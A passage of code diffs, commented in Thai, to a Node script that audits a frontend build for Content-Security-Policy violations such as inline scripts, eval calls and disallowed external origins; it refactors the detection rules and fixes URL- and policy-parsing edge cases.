+ * อยู่ในค่า attribute — `<img alt="a>b" src="//host">` ทำให้ `src` อยู่นอกช่วงที่ถูกตรวจทั้งดุ้น
+ * แล้ว guard quote-ไม่-สมดุลก็สั่งข้ามแท็กนั้นซ้ำอีกชั้น (fail-open สองชั้น จาก code review)
+ * รูปนี้ยังครอบ `el.src = "//host"` ในโค้ด JS ซึ่งทำให้เกิด request จริงเหมือนกัน
+ *
+ * ใช้ lookbehind ไม่ใช่ `\b` เพราะ `\b` ถือว่า `-` เป็นขอบเขตของคำ `data-src=` จึงถูกอ่านเป็น
+ * `src=` ซึ่งคือบั๊กเดิมของ review #3 · เรียงชื่อยาวก่อนสั้น เพราะ alternation เลือกตัวแรกที่ match
+ *
+ * **ข้อจำกัดที่รู้ตัว**: `href` ของ `<a>` (การ navigate ซึ่ง CSP ไม่คุม) กับของ
+ * `<link rel="stylesheet">` (subresource ซึ่ง style-src คุม) แยกจากกันไม่ได้ด้วย static
+ * analysis — เลือกฟ้องไว้ก่อนตามหลักการของ issue นี้ ทางออกคือใส่ origin นั้นใน
+ * NON_FETCHED_ORIGINS พร้อมเหตุผล (มีเทสล็อกไว้ว่านี่คือการตัดสินใจ ไม่ใช่ความพลาด)
  */
-const URL_ATTRIBUTES = new Set(['src', 'href', 'srcset', 'poster', 'data', 'action', 'formaction']);
+const URL_ATTRIBUTE_ASSIGNMENT =
+  /(?<![-\w])(?:formaction|srcset|poster|action|href|src)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'`=<>]+))/gi;
 
 /**
  * origin ของ URL ที่พบใน bundle — คืน `null` เมื่อเป็น path สัมพัทธ์ (อยู่ใต้ 'self' อยู่แล้ว)
@@ -180,15 +193,18 @@ const URL_ATTRIBUTES = new Set(['src', 'href', 'srcset', 'poster', 'data', 'acti
  * = ไม่มีกฎไหนครอบ ซึ่งเป็นช่องคลาสเดียวกับที่ฟังก์ชันนี้ถูกสร้างมาปิดพอดี
  *
  * **ข้อจำกัดที่รู้ตัว**: จับ `//host` เฉพาะที่มีบริบทบอกว่าเป็น URL (argument ของ fetch/XHR,
- * ใน `url()`, หรือค่าของ attribute ใน URL_ATTRIBUTES) · สตริง `//host` ลอย ๆ ไม่ถูกตรวจ
+ * ใน `url()`, หรือค่าที่ถูกกำหนดให้ attribute/property ตาม URL_ATTRIBUTE_ASSIGNMENT) · สตริง `//host` ลอย ๆ ไม่ถูกตรวจ
  * เพราะการไล่จับทุกที่ให้ false positive กับโค้ดปกติ (วัดกับ build จริงแล้วได้ `//i.test`
  * จาก regex literal ที่ bundler ลากมา)
  */
 function originOf(url) {
   const trimmed = url.trim();
   if (!/^(?:https?:)?\/\//i.test(trimmed)) return null; // path สัมพัทธ์ หรือ scheme อื่น
+  // `///x` มี scheme ถูกแต่ไม่มี host — URL parser **ไม่ throw** แต่ยกส่วนแรกของ path ขึ้นมา
+  // เป็น host แทน (`new URL("https:///z").origin === "https://z"`) จึงต้องตัดทิ้งเองก่อน
+  // ไม่งั้น gate จะฟ้อง origin ที่ไม่มีอยู่จริง · guard เดิมผูกกับ https จึงไม่ครอบรูป http
+  if (/^(?:https?:)?\/{3}/i.test(trimmed)) return null;
   const absolute = trimmed.startsWith('//') ? `https:${trimmed}` : trimmed;
-  if (/^https:\/\/[/\s]/.test(absolute)) return null; // `///…` ไม่ใช่ host ที่โหลดได้
   try {
     return new URL(absolute).origin.toLowerCase(); // CSP host-source ไม่แยกตัวพิมพ์
   } catch {
@@ -249,6 +265,137 @@ function walk(dir) {
   return out;
 }
 
+// ── กฎแต่ละข้อเป็นฟังก์ชันบริสุทธิ์ ─────────────────────────────────────────────
+// คืน finding ที่ยัง **ไม่มีชื่อไฟล์** ให้ผู้เรียกเติม — แยกออกมาเพราะตอนรวมอยู่ในลูปเดียว
+// ยาว 167 บรรทัด ทิศทางของ `continue` แต่ละตัวตรวจด้วยตาไม่ไหว จน guard ที่เพิ่มเข้าไป
+// เพื่อปิดช่องหนึ่งกลับเปิดอีกช่องโดยไม่มีใครเห็น (code review รอบที่สี่)
+
+/**
+ * R1 — inline `<script>` ที่มีเนื้อหา และ inline event handler ที่เป็น attribute ในแท็ก
+ *
+ * ใช้กับ **ทุกไฟล์ที่อ่าน** แต่ผูกกับ**รูปทรงของ markup ไม่ใช่ชนิดไฟล์** — CSP บล็อก handler
+ * ที่เขียนเป็น attribute ใน tag เท่านั้น ส่วน `el.onclick = fn` ในไฟล์ JS เป็นการ assign
+ * property ซึ่ง **CSP ไม่บล็อก** (สคริปต์ตัวนั้นผ่าน script-src มาแล้ว) การยิง regex ใส่ทั้งไฟล์
+ * จึงผิดทั้งเชิงเสียงรบกวนและเชิงความหมาย — ` once = true` เคยถูกจับเป็น handler (review M-A)
+ *
+ * guard เดิมแก้ด้วยการเดา "ไฟล์นี้เป็น HTML ไหม" ซึ่งพังทันทีที่ chunk เดียวมีทั้ง HTML
+ * fragment และโค้ดปกติ (review C2) ตอนนี้จำกัดขอบเขตไว้ใน **ช่วงแท็กเปิด** ซึ่งเป็นที่เดียว
+ * ที่ inline handler อยู่ได้จริง จึงไม่ต้องเดาชนิดไฟล์อีก
+ */
+function inlineScriptFindings(content) {
+  const found = [];
+  // จับที่ **แท็กเปิด** ไม่ใช่คู่เปิด-ปิด เพราะ bundler escape `</script>` เป็น `<\/script>`
+  // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
+  for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
+    // เชื่อผลการแตก attribute ได้ก็ต่อเมื่อ quote ปิดครบ ไม่งั้นตรวจต่อ (fail-closed)
+    const attrs = quotesBalanced(match[1]) ? parseAttributes(match[1]) : new Map();
+    if (attrs.has('src')) continue;
+    if (isNonExecutableType(attrs.get('type'))) continue;
+    // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
+    // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
+    const after = content.slice(match.index + match[0].length);
+    const closeAt = after.search(/<\\?\/script\s*>/i);
+    if (closeAt !== -1 && after.slice(0, closeAt).trim() === '') continue;
+    found.push({ rule: 'inline-script', directive: 'script-src', detail: `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${match[0].slice(0, 60)}` });
+  }
+  // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
+  // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
+  for (const tag of content.matchAll(/<[a-zA-Z][^>]*>/g)) {
+    for (const match of tag[0].matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
+      found.push({ rule: 'inline-event-handler', directive: 'script-src', detail: `พบ inline event handler: ${match[0].trim()} ใน ${tag[0].slice(0, 40)}` });
+    }
+  }
+  return found;
+}
+
+/**
+ * R2 — eval / Function constructor
+ *
+ * ครอบ `Function(` ที่ไม่มี `new` ด้วย เพราะ `Function("return this")()` เป็นสำนวนมาตรฐาน
+ * ของ polyfill ที่ bundler ลากติดมาบ่อยกว่า `new Function(` มาก (review I1) · ใช้กับทุกไฟล์
+ * ที่อ่าน ไม่ผูกกับนามสกุล — `eval(` ใน .html หรือไฟล์ไม่มีนามสกุลอันตรายเท่ากับใน .js
+ *
+ * **ข้อจำกัดที่รู้ตัว**: indirect eval (`(0,eval)(...)`, `window["eval"](...)`) และ
+ * `setTimeout("code")` regex จับไม่ได้โดยธรรมชาติ — ลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี
+ */
+function dynamicCodeFindings(content) {
+  const found = [];
+  for (const pattern of [/\beval\s*\(/g, /\b(?:new\s+)?Function\s*\(/g]) {
+    for (const match of content.matchAll(pattern)) {
+      found.push({ rule: 'dynamic-code', directive: 'script-src', detail: `พบการสร้างโค้ดตอน runtime: ${match[0].trim()}` });
+    }
+  }
+  return found;
+}
+
+/**
+ * R3/R4 — origin ภายนอกที่ policy ไม่ได้อนุญาต
+ *
+ * แยกสองระดับ: URL ที่ static analysis **รู้บริบทแล้ว** ว่าเป็น request เทียบกับ `connect-src`
+ * อย่างเดียว (review C1 — ถ้าใช้ allowlist รวม origin ที่อนุญาตไว้เพื่อโหลดฟอนต์จะกลายเป็น
+ * ใบผ่านให้ยิง API) ส่วน URL ที่บอกบริบทไม่ได้ใช้ allowlist รวมตามเดิม
+ *
+ * นับซ้ำแล้วสรุปเป็นรายการเดียวต่อ origin — ถ้ามีคนตั้ง VITE_API_URL เป็น absolute URL
+ * (เคสที่ gate นี้มีไว้จับ) origin เดียวจะโผล่หลายสิบครั้งต่อ chunk การพิมพ์ทีละครั้ง
+ * ทำให้คนอ่านเห็นจอเต็มไปด้วยข้อความเดียวกันแทนที่จะเห็นภาพรวม (review M-B)
+ */
+function externalOriginFindings(content, { policy, connectOrigins, allowedOrigins, consultedDirectives }) {
+  const found = [];
+  const reported = new Set(); // origin ที่ฟ้องด้วย connect-src ไปแล้ว — กันฟ้องซ้ำคนละ directive
+  for (const pattern of CONNECT_CALL_PATTERNS) {
+    for (const match of content.matchAll(pattern)) {
+      const origin = originOf(match[1]); // null = path สัมพัทธ์ ซึ่งอยู่ใต้ 'self' อยู่แล้ว
+      if (origin === null) continue;
+      if (connectOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
+      reported.add(origin);
+      found.push({
+        rule: 'external-origin',
+        directive: 'connect-src',
+        detail: `พบการเรียกข้อมูลไป ${origin} แต่ connect-src อนุญาตแค่ ${(policy.get('connect-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'} — จะถูกบล็อกหลัง enforce`,
+      });
+    }
+  }
+
+  const originCounts = new Map();
+  const countOrigin = (origin) => {
+    if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) return;
+    originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
+  };
+  for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
+    countOrigin(match[0].toLowerCase()); // CSP host-source ไม่แยกตัวพิมพ์
+  }
+
+  // สองกฎด้านล่างเก็บ **เฉพาะรูป protocol-relative** เพราะรูปเต็มถูก regex ด้านบนนับไปแล้ว
+  // ถ้าไม่กรอง origin เดียวจะถูกนับสองรอบ แล้วจำนวนครั้งในข้อความ error ผิดเป็นเท่าตัว
+  // (flag `i` ของ URL_FUNCTION_ARG ทำให้ `new URL("https://…")` ในไฟล์ JS เข้าข่ายด้วย)
+  const countIfProtocolRelative = (raw) => {
+    if (!isProtocolRelative(raw)) return;
+    const origin = originOf(raw);
+    if (origin !== null) countOrigin(origin);
+  };
+
+  // `url(…)` ในทุกไฟล์ ไม่ใช่เฉพาะ .css — `<style>` ใน HTML และ CSS-in-JS โหลดจริงเหมือนกัน
+  for (const match of content.matchAll(URL_FUNCTION_ARG)) countIfProtocolRelative(match[1]);
+
+  // attribute/property ที่ค่าเป็น URL — `<img src="//host">` คือบริบทที่บอกว่าเป็น URL
+  // ชัดกว่า url() ด้วยซ้ำ · จับที่คู่ชื่อ-ค่า ไม่พึ่งขอบเขตแท็ก (ดู URL_ATTRIBUTE_ASSIGNMENT)
+  for (const match of content.matchAll(URL_ATTRIBUTE_ASSIGNMENT)) {
+    const value = match[1] ?? match[2] ?? match[3] ?? '';
+    // srcset เป็นรายการคั่นด้วย comma และมี descriptor ต่อท้ายแต่ละตัว · ชิ้นส่วน base64
+    // ของ data URI ที่ถูกแตกมาด้วยจะตกไปเองเพราะไม่ได้ขึ้นต้นด้วย `//`
+    for (const entry of value.split(',')) countIfProtocolRelative(entry.trim().split(/\s+/)[0] ?? '');
+  }
+
+  for (const [origin, count] of originCounts) {
+    found.push({
+      rule: 'external-origin',
+      directive: consultedDirectives,
+      detail: `พบ origin ที่ policy ไม่ได้อนุญาต: ${origin}${count > 1 ? ` (${count} ครั้งในไฟล์นี้)` : ''} — ถ้าโค้ดโหลดจากที่นี่จริงจะถูกบล็อกหลัง enforce`,
+    });
+  }
+  return found;
+}
+
 /**
  * ตรวจ build output เทียบกับ policy
  *
@@ -273,6 +420,8 @@ function auditBundle(distDir, cspValue) {
   const connectOrigins = policyOrigins(policy.get('connect-src'));
   // directive ที่รายงานต้องสะท้อน policy จริง แก้ policy แล้วข้อความตามเอง
   const consultedDirectives = FETCH_DIRECTIVES.filter((d) => policy.has(d)).join(' / ') || 'default-src';
+  // สี่ค่านี้เดินทางด้วยกันเสมอในกฎ R3/R4 จึงมัดเป็นก้อนเดียว แทนที่จะส่งทีละตัว
+  const originContext = { policy, connectOrigins, allowedOrigins, consultedDirectives };
   const allowsInlineScript = hasSource(policy, 'script-src', "'unsafe-inline'");
   const allowsDynamicCode = hasSource(policy, 'script-src', "'unsafe-eval'");
   const allowsSelfFont = hasSource(policy, 'font-src', "'self'");
@@ -308,121 +457,11 @@ function auditBundle(distDir, cspValue) {
     inspected++;
     const content = readFileSync(file, 'utf8');
 
-    // R2 (eval/Function) ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ผูกกับนามสกุล — `eval(` ใน .html หรือ
-    // ไฟล์ไม่มีนามสกุล อันตรายเท่ากับใน .js และการผูกกฎกับนามสกุลคือต้นเหตุของ C1
-    //
-    // R1 (inline script/handler) ก็ใช้กับทุกไฟล์เช่นกัน แต่**ผูกกับรูปทรงของ markup ไม่ใช่
-    // ชนิดไฟล์** — CSP บล็อก handler ที่เขียนเป็น attribute ใน tag เท่านั้น ส่วน
-    // `el.onclick = fn` ในไฟล์ JS เป็นการ assign property ซึ่ง **CSP ไม่บล็อก**
-    // (สคริปต์ตัวนั้นผ่าน script-src มาแล้ว) การยิง regex ใส่ทั้งไฟล์จึงผิดทั้งเชิงเสียงรบกวน
-    // และเชิงความหมาย — ` once = true` / ` only = 1` เคยถูกจับเป็น handler (code review M-A)
-    //
-    // guard เดิมแก้ด้วยการเดา "ไฟล์นี้เป็น HTML ไหม" ซึ่งพังทันทีที่ chunk เดียวมีทั้ง HTML
-    // fragment และโค้ดปกติ — พอมีสตริง `<script` ปนอยู่ ทั้งไฟล์ถูกพลิกเป็นโหมด HTML แล้ว
-    // false positive เดิมก็กลับมา (review C2) ตอนนี้จำกัดขอบเขตไว้ใน **ช่วงแท็กเปิด**
-    // ซึ่งเป็นที่เดียวที่ inline handler อยู่ได้จริง จึงไม่ต้องเดาชนิดไฟล์อีก
-    if (!allowsInlineScript) {
-      // จับที่ **แท็กเปิด** ไม่ใช่คู่เปิด-ปิด เพราะ bundler escape `</script>` เป็น `<\/script>`
-      // ในสตริง JS เสมอ (กัน HTML parser ตัดจบก่อนเวลา) กฎที่จับเป็นคู่จึงมองไม่เห็นเคสนั้นเลย
-      // — พิสูจน์ด้วยเทส `HTML fragment ที่ฝังใน JS พร้อม <script>`
-      for (const match of content.matchAll(/<script\b([^>]*)>/gi)) {
-        // เชื่อผลการแตก attribute ได้ก็ต่อเมื่อ quote ปิดครบ ไม่งั้นตรวจต่อ (fail-closed)
-        const attrs = quotesBalanced(match[1]) ? parseAttributes(match[1]) : new Map();
-        if (attrs.has('src')) continue;
-        if (isNonExecutableType(attrs.get('type'))) continue;
-        // spec R1 พูดถึง inline script "ที่มีเนื้อหา" — แท็กว่างเปล่า browser ไม่บล็อก
-        // รับแท็กปิดทั้งรูปปกติและรูปที่ถูก escape · หาไม่เจอ = ถือว่ามีเนื้อหา (fail-closed)
-        const after = content.slice(match.index + match[0].length);
-        const closeAt = after.search(/<\\?\/script\s*>/i);
-        if (closeAt !== -1 && after.slice(0, closeAt).trim() === '') continue;
-        add(file, 'inline-script', 'script-src', `พบ <script> ที่ไม่มี src (โค้ดฝังในตัว): ${match[0].slice(0, 60)}`);
-      }
-      // `["']?` เพราะ HTML ยอมให้ค่า attribute ไม่มีเครื่องหมายคำพูด (`<button onclick=go()>`)
-      // ซึ่งของเดิมหลุด — `frontend/public/50x.html` เป็นไฟล์ที่คนแก้ด้วยมือ จึงเกิดได้จริง
-      for (const tag of content.matchAll(/<[a-zA-Z][^>]*>/g)) {
-        for (const match of tag[0].matchAll(/\son[a-z]+\s*=\s*["']?/gi)) {
-          add(file, 'inline-event-handler', 'script-src', `พบ inline event handler: ${match[0].trim()} ใน ${tag[0].slice(0, 40)}`);
-        }
-      }
-    }
-
-    // R2 — eval / Function constructor (script-src ที่ไม่มี 'unsafe-eval')
-    // ครอบ `Function(` ที่ไม่มี `new` ด้วย เพราะ `Function("return this")()` เป็นสำนวน
-    // มาตรฐานของ polyfill ที่ bundler ลากติดมาบ่อยกว่า `new Function(` มาก (code review I1)
-    // **ข้อจำกัดที่รู้ตัว**: indirect eval (`(0,eval)(...)`, `window["eval"](...)`) และ
-    // `setTimeout("code")` regex จับไม่ได้โดยธรรมชาติ — gate นี้จึงลดความเสี่ยง ไม่ใช่พิสูจน์ว่าไม่มี
-    if (!allowsDynamicCode) {
-      for (const pattern of [/\beval\s*\(/g, /\b(?:new\s+)?Function\s*\(/g]) {
-        for (const match of content.matchAll(pattern)) {
-          add(file, 'dynamic-code', 'script-src', `พบการสร้างโค้ดตอน runtime: ${match[0].trim()}`);
-        }
-      }
-    }
-
-    // R3/R4 — absolute URL ที่ไม่ได้อยู่ใน policy และไม่ใช่ URL ที่ไม่ถูก fetch
-    //
-    // นับซ้ำแล้วสรุปเป็นรายการเดียวต่อ (ไฟล์ × origin) — ถ้ามีคนตั้ง VITE_API_URL เป็น absolute
-    // URL (ความเสี่ยงข้อ 1 ในเอกสาร = เคสที่ gate นี้มีไว้จับ) origin เดียวจะโผล่หลายสิบครั้ง
-    // ต่อ chunk การพิมพ์ทีละครั้งทำให้คนอ่านเห็นจอเต็มไปด้วยข้อความเดียวกันแทนที่จะเห็นภาพรวม
-    // R3a — URL ที่ static analysis **รู้บริบทแล้ว** ว่าเป็น request ต้องเทียบกับ connect-src
-    // อย่างเดียว ไม่ใช่ allowlist รวมทุก directive (review C1) · ตรวจก่อนกฎรวม แล้วจำไว้ว่า
-    // origin ไหนรายงานไปแล้ว เพื่อไม่ให้ปัญหาเดียวถูกฟ้องสองครั้งด้วยคนละ directive
-    const reported = new Set();
-    for (const pattern of CONNECT_CALL_PATTERNS) {
-      for (const match of content.matchAll(pattern)) {
-        // null = path สัมพัทธ์ ซึ่งอยู่ใต้ 'self' อยู่แล้ว · `//host/…` ไม่นับเป็นสัมพัทธ์
-        const origin = originOf(match[1]);
-        if (origin === null) continue;
-        if (connectOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) continue;
-        reported.add(origin);
-        add(
-          file,
-          'external-origin',
-          'connect-src',
-          `พบการเรียกข้อมูลไป ${origin} แต่ connect-src อนุญาตแค่ ${(policy.get('connect-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'} — จะถูกบล็อกหลัง enforce`
-        );
-      }
-    }
-
-    // R3b/R4 — URL ที่เหลือซึ่งบอกบริบทไม่ได้ เทียบกับ allowlist รวมตามเดิม
-    const originCounts = new Map();
-    const countOrigin = (origin) => {
-      if (allowedOrigins.has(origin) || NON_FETCHED_ORIGINS.has(origin) || reported.has(origin)) return;
-      originCounts.set(origin, (originCounts.get(origin) ?? 0) + 1);
-    };
-    for (const match of content.matchAll(/https?:\/\/[a-zA-Z0-9.-]+(?::\d+)?/g)) {
-      countOrigin(match[0].toLowerCase()); // CSP host-source ไม่แยกตัวพิมพ์
-    }
-    // สองกฎด้านล่างเก็บ **เฉพาะรูป protocol-relative** เพราะรูปเต็มถูก regex ด้านบนนับไปแล้ว
-    // ถ้าไม่กรอง origin เดียวจะถูกนับสองรอบ แล้วจำนวนครั้งในข้อความ error ผิดเป็นเท่าตัว
-    // (flag `i` ของ URL_FUNCTION_ARG ทำให้ `new URL("https://…")` ในไฟล์ JS เข้าข่ายด้วย)
-    const countIfProtocolRelative = (raw) => {
-      if (!isProtocolRelative(raw)) return;
-      const origin = originOf(raw);
-      if (origin !== null) countOrigin(origin);
-    };
-
-    // `url(…)` ในทุกไฟล์ ไม่ใช่เฉพาะ .css — `<style>` ใน HTML และ CSS-in-JS โหลดจริงเหมือนกัน
-    for (const match of content.matchAll(URL_FUNCTION_ARG)) countIfProtocolRelative(match[1]);
-
-    // attribute ที่ค่าเป็น URL — `<img src="//host">` / `<link href="//host">` คือบริบทที่บอกว่า
-    // เป็น URL ชัดกว่า url() ด้วยซ้ำ การไม่ตรวจทำให้ข้อจำกัดที่ประกาศไว้บรรยายของจริงผิด
-    for (const tag of content.matchAll(/<[a-zA-Z][^>]*>/g)) {
-      if (!quotesBalanced(tag[0])) continue; // แยก attribute ไม่ได้ — กฎรวมยังคุมสตริงอยู่
-      for (const [name, value] of parseAttributes(tag[0].replace(/^<[a-zA-Z][a-zA-Z0-9-]*/, ''))) {
-        if (!URL_ATTRIBUTES.has(name)) continue;
-        // srcset เป็นรายการคั่นด้วย comma และมี descriptor ต่อท้ายแต่ละตัว
-        for (const candidate of value.split(',')) countIfProtocolRelative(candidate.trim().split(/\s+/)[0] ?? '');
-      }
-    }
-    for (const [origin, count] of originCounts) {
-      add(
-        file,
-        'external-origin',
-        consultedDirectives,
-        `พบ origin ที่ policy ไม่ได้อนุญาต: ${origin}${count > 1 ? ` (${count} ครั้งในไฟล์นี้)` : ''} — ถ้าโค้ดโหลดจากที่นี่จริงจะถูกบล็อกหลัง enforce`
-      );
-    }
+    // กฎแต่ละข้ออยู่ในฟังก์ชันของตัวเอง (ดูด้านบน) — ที่นี่เหลือแค่ประกอบผลเข้ากับชื่อไฟล์
+    const push = (list) => { for (const f of list) add(file, f.rule, f.directive, f.detail); };
+    if (!allowsInlineScript) push(inlineScriptFindings(content));
+    if (!allowsDynamicCode) push(dynamicCodeFindings(content));
+    push(externalOriginFindings(content, originContext));
   }
 
   return { findings, inspected, skipped, scanned: files.length };

--- a/scripts/audit-bundle-csp.mjs
+++ b/scripts/audit-bundle-csp.mjs
@@ -2,8 +2,9 @@
 // CSP bundle audit — issue #113 (R2): ตรวจ build output ว่าจะชน CSP หลัง enforce ไหม
 //
 // ทำไมต้องมี: การตรวจว่า bundle มีอะไรที่ policy จะบล็อกบ้าง เคยทำด้วยการ "อ่านด้วยตา"
-// แล้วบันทึกเป็นร้อยแก้วใน docs/frontend-security-headers.md — ครอบแค่ 6 chunk จากของจริง 65
-// ไฟล์ ส่วนที่เหลือไม่เคยถูกตรวจเลย และไม่มีอะไรกันไม่ให้ chunk ใหม่พาของต้องห้ามเข้ามา
+// แล้วบันทึกเป็นร้อยแก้วใน docs/frontend-security-headers.md — ครอบแค่ 6 chunk จากของจริง
+// 74 ไฟล์ (65 JS chunk + 4 CSS + 2 HTML + 3 อื่น ๆ) ส่วนที่เหลือไม่เคยถูกตรวจเลย และไม่มี
+// อะไรกันไม่ให้ chunk ใหม่พาของต้องห้ามเข้ามา
 //
 // สคริปต์นี้อ่าน policy จาก render.yaml (single source of truth เดียวกับ verify-live-headers.mjs)
 // แล้วสแกน frontend/dist ทั้งโฟลเดอร์ — กฎทุกข้อผูกกับ directive จริง ไม่ใช่กฎที่ hardcode ไว้
@@ -23,10 +24,31 @@ import { parseRenderHeaders } from './verify-live-headers.mjs';
 const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..');
 const RENDER_YAML = resolve(ROOT, 'render.yaml');
 const DEFAULT_DIST = resolve(ROOT, 'frontend', 'dist');
-const CSP_HEADER = 'Content-Security-Policy-Report-Only';
+// รองรับทั้งสองชื่อ เพราะ gate นี้มีไว้รองรับการย้าย report-only → enforce พอดี
+// ถ้าผูกกับชื่อเดียวแล้ววันกดสวิตช์ gate จะพังทันทีในจังหวะที่คนกำลังรีบที่สุด
+const CSP_HEADERS = ['Content-Security-Policy', 'Content-Security-Policy-Report-Only'];
+const SHELL_PATH = '/*';
 
 const FONT_EXTENSIONS = new Set(['.woff', '.woff2', '.ttf', '.otf', '.eot']);
-const TEXT_EXTENSIONS = new Set(['.js', '.mjs', '.css', '.html']);
+
+/**
+ * นามสกุลที่เป็น binary จริง — ข้ามได้เพราะไม่มีโค้ด/URL ที่ browser จะ execute หรือ fetch ต่อ
+ *
+ * **ทุกอย่างที่ไม่อยู่ในลิสต์นี้จะถูกอ่านและตรวจ** (fail-closed) — ของเดิมทำกลับกันคือ
+ * ตรวจเฉพาะนามสกุลที่รู้จักแล้วข้ามที่เหลือเงียบ ๆ ซึ่งทำให้ `_redirects` (ไม่มีนามสกุล
+ * และมี URL ของ backend อยู่) ไม่เคยถูกเปิดเลยทั้งที่ถูกนับรวมในตัวเลข "ตรวจแล้ว N ไฟล์"
+ * — code review เรียกสิ่งนี้ว่า "ไม่ได้ตรวจ ถูกรายงานเป็น ตรวจแล้วสะอาด" ซึ่งเป็น failure
+ * mode ที่แพงที่สุดของ gate ประเภทนี้
+ */
+const BINARY_EXTENSIONS = new Set(['.png', '.jpg', '.jpeg', '.gif', '.webp', '.avif', '.ico', '.xlsx', '.xls', '.pdf', '.zip', '.mp4', '.webm']);
+
+/**
+ * ไฟล์ที่อยู่ใน dist แต่ browser ไม่เคยโหลดเป็น subresource จึงไม่อยู่ใต้ CSP
+ * ต้องมีเหตุผลรายตัวเหมือน NON_FETCHED_ORIGINS (มีเทสบังคับ)
+ */
+const NON_BROWSER_FILES = new Map([
+  ['_redirects', 'ไฟล์ตั้งค่า rewrite ของ Render edge — CDN อ่านฝั่งเซิร์ฟเวอร์ ไม่เคยถูกส่งให้ browser โหลด URL ข้างในจึงไม่ผ่าน CSP'],
+]);
 
 /**
  * origin ที่ปรากฏใน bundle ได้โดยไม่ถูก browser โหลดจริง จึงไม่อยู่ใต้ directive ใด
@@ -59,13 +81,23 @@ function parseArgs(argv) {
   return args;
 }
 
-/** แตก policy string เป็น Map<directive, sources[]> */
+/**
+ * แตก policy string เป็น Map<directive, sources[]>
+ *
+ * **first-wins** ตามที่ browser ทำจริง — ถ้า directive ซ้ำใน policy เดียวกัน browser ใช้ตัวแรก
+ * และ ignore ตัวหลัง ของเดิมใช้ `Map.set` ตรง ๆ จึงกลายเป็น last-wins ซึ่งตรงข้าม ผลคือ
+ * `script-src 'self'; script-src 'unsafe-eval'` จะทำให้ gate เลิกฟ้อง `eval(` ทั้งที่ browser
+ * ยังบล็อกอยู่ = false PASS (code review I2 พิสูจน์ด้วย fixture จริง)
+ * ชื่อ directive ถูกทำเป็นตัวพิมพ์เล็กเพราะ CSP ไม่แยกตัวพิมพ์
+ */
 function parseCspPolicy(value) {
   const policy = new Map();
   for (const part of value.split(';')) {
     const tokens = part.trim().split(/\s+/).filter(Boolean);
     if (tokens.length === 0) continue;
-    policy.set(tokens[0], tokens.slice(1));
+    const name = tokens[0].toLowerCase();
+    if (policy.has(name)) continue;
+    policy.set(name, tokens.slice(1));
   }
   return policy;
 }
@@ -125,36 +157,60 @@ function auditBundle(distDir, cspValue) {
   const allowsDynamicCode = hasSource(policy, 'script-src', "'unsafe-eval'");
   const allowsSelfFont = hasSource(policy, 'font-src', "'self'");
   const findings = [];
+  const skipped = [];
+  let inspected = 0;
   const add = (file, rule, directive, detail) => findings.push({ file: relative(distDir, file).replace(/\\/g, '/'), rule, directive, detail });
 
   for (const file of files) {
     const ext = extname(file).toLowerCase();
+    const base = file.split(/[\\/]/).pop();
+    const rel = relative(distDir, file).replace(/\\/g, '/');
 
     // R5 — font ที่ self-host จะถูกบล็อกถ้า font-src ไม่มี 'self'
-    if (FONT_EXTENSIONS.has(ext) && !allowsSelfFont) {
-      add(file, 'self-hosted-font', 'font-src', `ไฟล์ font ใน bundle แต่ font-src ไม่มี 'self' (${(policy.get('font-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'})`);
+    if (FONT_EXTENSIONS.has(ext)) {
+      if (!allowsSelfFont) {
+        add(file, 'self-hosted-font', 'font-src', `ไฟล์ font ใน bundle แต่ font-src ไม่มี 'self' (${(policy.get('font-src') ?? []).join(' ') || 'ไม่ได้ประกาศ'})`);
+      }
+      skipped.push({ file: rel, reason: 'ไฟล์ font — ตรวจด้วยกฎ self-hosted-font ไม่ต้องอ่านเนื้อหา' });
       continue;
     }
-    if (!TEXT_EXTENSIONS.has(ext)) continue;
+    if (NON_BROWSER_FILES.has(base)) {
+      skipped.push({ file: rel, reason: NON_BROWSER_FILES.get(base) });
+      continue;
+    }
+    if (BINARY_EXTENSIONS.has(ext)) {
+      skipped.push({ file: rel, reason: `นามสกุล ${ext} เป็น binary ไม่มีโค้ดหรือ URL ที่ browser จะใช้ต่อ` });
+      continue;
+    }
 
+    // ทุกอย่างที่เหลือถูกอ่านและตรวจ — รวมถึงนามสกุลที่ยังไม่รู้จักและไฟล์ที่ไม่มีนามสกุล
+    inspected++;
     const content = readFileSync(file, 'utf8');
 
+    // R1/R2 ใช้กับ **ทุกไฟล์ที่อ่าน** ไม่ผูกกับนามสกุล — `<script>` ใน .svg และ `eval(` ใน .html
+    // อันตรายเท่ากับใน .js และการผูกกฎกับนามสกุลคือวิธีเดียวกับที่ทำให้ C1 เกิดขึ้น
     // R1 — inline script / inline event handler (script-src ที่ไม่มี 'unsafe-inline')
-    if (ext === '.html' && !allowsInlineScript) {
+    if (!allowsInlineScript) {
       for (const match of content.matchAll(/<script\b([^>]*)>([\s\S]*?)<\/script>/gi)) {
         const [, attrs, body] = match;
         if (body.trim() !== '' && !/\bsrc\s*=/i.test(attrs)) {
           add(file, 'inline-script', 'script-src', `พบ <script> ที่มีเนื้อหาในตัว: ${body.trim().slice(0, 60)}`);
         }
       }
